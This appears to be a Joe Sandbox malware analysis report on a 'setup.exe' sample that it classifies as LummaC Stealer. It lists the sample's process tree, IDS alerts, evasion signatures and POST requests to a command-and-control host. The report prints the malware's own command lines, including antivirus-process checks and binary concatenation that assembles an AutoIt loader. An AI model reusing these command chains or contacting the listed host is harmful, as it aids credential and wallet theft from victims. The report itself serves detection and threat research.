Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
setup.exe

Overview

General Information

Sample name:setup.exe
Analysis ID:1604056
MD5:c804e1074af9d7cffa16e6bd084bea42
SHA1:dba96c1d8dd56520fcbc65b1d1dd0a8da91e81c5
SHA256:d0710b55aa4f4424d4b14ad320e6615dc230f2af271a1f260ea475141f9d0091
Tags:AutoITexeLummaStealeruser-aachum
Infos:

Detection

LummaC Stealer
Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
Drops PE files with a suspicious file extension
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Sigma detected: Suspicious Copy From or To System Directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication

Classification

  • System is w10x64
  • setup.exe (PID: 7088 cmdline: "C:\Users\user\Desktop\setup.exe" MD5: C804E1074AF9D7CFFA16E6BD084BEA42)
    • cmd.exe (PID: 4460 cmdline: "C:\Windows\System32\cmd.exe" /c copy Fashion Fashion.cmd & Fashion.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 2104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 3568 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 5148 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 1276 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 5560 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 6508 cmdline: cmd /c md 224177 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • extrac32.exe (PID: 6532 cmdline: extrac32 /Y /E Wellington MD5: 9472AAB6390E4F1431BAA912FCFF9707)
      • findstr.exe (PID: 1892 cmdline: findstr /V "Tranny" Yale MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 6172 cmdline: cmd /c copy /b 224177\Benefits.com + Photographer + Vacuum + Separate + Valium + Continuing + Training + Hours + Kissing + Accepts + Verde + Quotations 224177\Benefits.com MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • cmd.exe (PID: 2860 cmdline: cmd /c copy /b ..\Searches + ..\Coordinated + ..\Students + ..\Approve + ..\There + ..\Molecular + ..\Updated y MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Benefits.com (PID: 2636 cmdline: Benefits.com y MD5: 62D09F076E6E0240548C2F837536A46A)
      • choice.exe (PID: 1680 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c copy Fashion Fashion.cmd & Fashion.cmd, CommandLine: "C:\Windows\System32\cmd.exe" /c copy Fashion Fashion.cmd & Fashion.cmd, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\setup.exe", ParentImage: C:\Users\user\Desktop\setup.exe, ParentProcessId: 7088, ParentProcessName: setup.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c copy Fashion Fashion.cmd & Fashion.cmd, ProcessId: 4460, ProcessName: cmd.exe

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Source: Process startedAuthor: Joe Security: Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c copy Fashion Fashion.cmd & Fashion.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 4460, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , ProcessId: 5560, ProcessName: findstr.exe
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2025-01-31T19:55:27.414990+010020283713Unknown Traffic192.168.2.549859172.67.158.151443TCP
      2025-01-31T19:55:28.426156+010020283713Unknown Traffic192.168.2.549865172.67.158.151443TCP
      2025-01-31T19:55:29.615601+010020283713Unknown Traffic192.168.2.549876172.67.158.151443TCP
      2025-01-31T19:55:33.019549+010020283713Unknown Traffic192.168.2.549897172.67.158.151443TCP
      2025-01-31T19:55:34.278514+010020283713Unknown Traffic192.168.2.549908172.67.158.151443TCP
      2025-01-31T19:55:35.656321+010020283713Unknown Traffic192.168.2.549916172.67.158.151443TCP
      2025-01-31T19:55:37.106613+010020283713Unknown Traffic192.168.2.549926172.67.158.151443TCP
      2025-01-31T19:55:39.254001+010020283713Unknown Traffic192.168.2.549941172.67.158.151443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2025-01-31T19:55:27.918654+010020546531A Network Trojan was detected192.168.2.549859172.67.158.151443TCP
      2025-01-31T19:55:28.933956+010020546531A Network Trojan was detected192.168.2.549865172.67.158.151443TCP
      2025-01-31T19:55:39.780089+010020546531A Network Trojan was detected192.168.2.549941172.67.158.151443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2025-01-31T19:55:27.918654+010020498361A Network Trojan was detected192.168.2.549859172.67.158.151443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2025-01-31T19:55:28.933956+010020498121A Network Trojan was detected192.168.2.549865172.67.158.151443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2025-01-31T19:55:33.697217+010020480941Malware Command and Control Activity Detected192.168.2.549897172.67.158.151443TCP

      Click to jump to signature section

      Show All Signature Results
      Source: setup.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: unknownHTTPS traffic detected: 172.67.158.151:443 -> 192.168.2.5:49859 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.158.151:443 -> 192.168.2.5:49865 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.158.151:443 -> 192.168.2.5:49876 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.158.151:443 -> 192.168.2.5:49897 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.158.151:443 -> 192.168.2.5:49908 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.158.151:443 -> 192.168.2.5:49916 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.158.151:443 -> 192.168.2.5:49926 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.158.151:443 -> 192.168.2.5:49941 version: TLS 1.2
      Source: setup.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_004062D5 FindFirstFileW,FindClose,0_2_004062D5
      Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00402E18 FindFirstFileW,0_2_00402E18
      Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406C9B
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\224177Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\224177\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior

      Networking

      barindex
      Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49859 -> 172.67.158.151:443
      Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49859 -> 172.67.158.151:443
      Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49865 -> 172.67.158.151:443
      Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49865 -> 172.67.158.151:443
      Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49897 -> 172.67.158.151:443
      Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49941 -> 172.67.158.151:443
      Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
      Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49876 -> 172.67.158.151:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49865 -> 172.67.158.151:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49908 -> 172.67.158.151:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49859 -> 172.67.158.151:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49926 -> 172.67.158.151:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49897 -> 172.67.158.151:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49916 -> 172.67.158.151:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49941 -> 172.67.158.151:443
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: vividimaginatigon.top
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 48Host: vividimaginatigon.top
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=4RB73AYMHFAM9Q3E3User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12830Host: vividimaginatigon.top
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=0KQEZWD6WNG4BIUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15054Host: vividimaginatigon.top
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=RWPJQ4XWK3D3PUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20538Host: vividimaginatigon.top
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=DYU7H78V6PGXDQUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 2448Host: vividimaginatigon.top
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=P5C22XRYO9WSL2U94DUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 551900Host: vividimaginatigon.top
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 83Host: vividimaginatigon.top
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficDNS traffic detected: DNS query: aWntkHZhzENhUIyZkjTD.aWntkHZhzENhUIyZkjTD
      Source: global trafficDNS traffic detected: DNS query: vividimaginatigon.top
      Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: vividimaginatigon.top
      Source: setup.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
      Source: setup.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
      Source: setup.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
      Source: setup.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
      Source: Verde.9.dr, Benefits.com.2.drString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
      Source: Verde.9.dr, Benefits.com.2.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
      Source: Quotations.9.dr, Benefits.com.2.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
      Source: Verde.9.dr, Benefits.com.2.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
      Source: Verde.9.dr, Benefits.com.2.drString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
      Source: setup.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
      Source: setup.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
      Source: setup.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
      Source: setup.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
      Source: setup.exeString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
      Source: setup.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
      Source: setup.exeString found in binary or memory: http://ocsp.digicert.com0
      Source: setup.exeString found in binary or memory: http://ocsp.digicert.com0A
      Source: setup.exeString found in binary or memory: http://ocsp.digicert.com0C
      Source: setup.exeString found in binary or memory: http://ocsp.digicert.com0X
      Source: Verde.9.dr, Benefits.com.2.drString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
      Source: Verde.9.dr, Benefits.com.2.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
      Source: Quotations.9.dr, Verde.9.dr, Benefits.com.2.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
      Source: Verde.9.dr, Benefits.com.2.drString found in binary or memory: http://ocsp2.globalsign.com/rootr606
      Source: Verde.9.dr, Benefits.com.2.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
      Source: Verde.9.dr, Benefits.com.2.drString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
      Source: Benefits.com, 0000000D.00000000.2127634628.0000000000945000.00000002.00000001.01000000.00000008.sdmp, Verde.9.dr, Benefits.com.2.drString found in binary or memory: http://www.autoitscript.com/autoit3/X
      Source: setup.exeString found in binary or memory: http://www.digicert.com/CPS0
      Source: Verde.9.dr, Benefits.com.2.drString found in binary or memory: https://www.autoitscript.com/autoit3/
      Source: Benefits.com.2.drString found in binary or memory: https://www.globalsign.com/repository/0
      Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49897
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49941
      Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49897 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49908
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49916
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49926
      Source: unknownNetwork traffic detected: HTTP traffic on port 49941 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
      Source: unknownHTTPS traffic detected: 172.67.158.151:443 -> 192.168.2.5:49859 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.158.151:443 -> 192.168.2.5:49865 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.158.151:443 -> 192.168.2.5:49876 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.158.151:443 -> 192.168.2.5:49897 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.158.151:443 -> 192.168.2.5:49908 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.158.151:443 -> 192.168.2.5:49916 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.158.151:443 -> 192.168.2.5:49926 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.158.151:443 -> 192.168.2.5:49941 version: TLS 1.2
      Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_004050CD GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004050CD
      Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044A5
      Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00403883 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,0_2_00403883
      Source: C:\Users\user\Desktop\setup.exeFile created: C:\Windows\ConnectorsTrustJump to behavior
      Source: C:\Users\user\Desktop\setup.exeFile created: C:\Windows\FooTaxJump to behavior
      Source: C:\Users\user\Desktop\setup.exeFile created: C:\Windows\HeraldContinentalJump to behavior
      Source: C:\Users\user\Desktop\setup.exeFile created: C:\Windows\UsaDramaticallyJump to behavior
      Source: C:\Users\user\Desktop\setup.exeFile created: C:\Windows\FittingMilJump to behavior
      Source: C:\Users\user\Desktop\setup.exeFile created: C:\Windows\InformedPastaJump to behavior
      Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_0040497C0_2_0040497C
      Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00406ED20_2_00406ED2
      Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_004074BB0_2_004074BB
      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\224177\Benefits.com 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
      Source: C:\Users\user\Desktop\setup.exeCode function: String function: 004062A3 appears 58 times
      Source: setup.exeStatic PE information: invalid certificate
      Source: setup.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: classification engineClassification label: mal96.troj.spyw.evad.winEXE@26/24@2/1
      Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044A5
      Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_004024FB CoCreateInstance,0_2_004024FB
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2104:120:WilError_03
      Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Temp\nso9154.tmpJump to behavior
      Source: setup.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
      Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
      Source: C:\Users\user\Desktop\setup.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\setup.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: tasklist.exe, 00000004.00000002.2110927497.00000000036A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Processows;
      Source: C:\Users\user\Desktop\setup.exeFile read: C:\Users\user\Desktop\setup.exeJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\setup.exe "C:\Users\user\Desktop\setup.exe"
      Source: C:\Users\user\Desktop\setup.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Fashion Fashion.cmd & Fashion.cmd
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 224177
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Wellington
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "Tranny" Yale
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 224177\Benefits.com + Photographer + Vacuum + Separate + Valium + Continuing + Training + Hours + Kissing + Accepts + Verde + Quotations 224177\Benefits.com
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Searches + ..\Coordinated + ..\Students + ..\Approve + ..\There + ..\Molecular + ..\Updated y
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\224177\Benefits.com Benefits.com y
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
      Source: C:\Users\user\Desktop\setup.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Fashion Fashion.cmd & Fashion.cmdJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa" Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 224177Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E WellingtonJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "Tranny" Yale Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 224177\Benefits.com + Photographer + Vacuum + Separate + Valium + Continuing + Training + Hours + Kissing + Accepts + Verde + Quotations 224177\Benefits.comJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Searches + ..\Coordinated + ..\Students + ..\Approve + ..\There + ..\Molecular + ..\Updated yJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\224177\Benefits.com Benefits.com yJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
      Source: C:\Users\user\Desktop\setup.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\setup.exeSection loaded: acgenral.dllJump to behavior
      Source: C:\Users\user\Desktop\setup.exeSection loaded: uxtheme.dllJump to behavior
